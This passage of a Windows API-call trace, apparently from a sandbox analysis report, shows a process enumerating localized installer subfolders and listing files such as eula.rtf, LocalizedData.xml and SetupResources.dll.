ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.839] FindNextFileW (in: hFindFile=0x42603c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.843] FindClose (in: hFindFile=0x42603c8 | out: hFindFile=0x42603c8) returned 1 [0045.843] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.843] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0045.843] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.843] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.843] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.843] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.844] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.844] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0045.844] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.844] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.844] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.845] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.845] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0045.845] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.845] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0045.845] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.845] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.845] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0045.846] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.846] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0045.846] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.846] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42604c8 [0045.847] FindNextFileW (in: hFindFile=0x42604c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.847] FindNextFileW (in: hFindFile=0x42604c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.847] FindNextFileW (in: hFindFile=0x42604c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.847] FindNextFileW (in: hFindFile=0x42604c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.848] FindNextFileW (in: hFindFile=0x42604c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.848] FindClose (in: hFindFile=0x42604c8 | out: hFindFile=0x42604c8) returned 1 [0045.848] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.848] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0045.849] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.849] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260808 [0045.850] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.856] FindClose (in: hFindFile=0x4260808 | out: hFindFile=0x4260808) returned 1 [0045.856] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.856] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0045.856] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.856] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.857] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.857] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.857] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.857] HeapFree (in: hHeap=0x5d0000, 